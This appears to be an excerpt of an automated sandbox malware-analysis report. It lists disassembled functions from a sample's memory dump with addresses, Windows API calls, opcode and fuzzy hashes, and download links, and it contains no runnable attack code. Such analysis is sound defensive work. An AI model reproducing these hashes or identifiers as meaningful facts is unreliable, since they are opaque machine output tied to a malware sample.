                                • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00433946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction Fuzzy Hash:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043E0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00427A46 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044D9C9 Relevance: .6, Instructions: 637COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041F0FA Relevance: .6, Instructions: 598COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042739D Relevance: .4, Instructions: 435COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                • Opcode Fuzzy Hash: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00426E0E Relevance: .4, Instructions: 383COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                • Opcode Fuzzy Hash: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00437D33 Relevance: .3, Instructions: 345COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00438168 Relevance: .3, Instructions: 341COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004378FE Relevance: .3, Instructions: 331COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004374E6 Relevance: .3, Instructions: 323COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041DB62 Relevance: .3, Instructions: 277COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
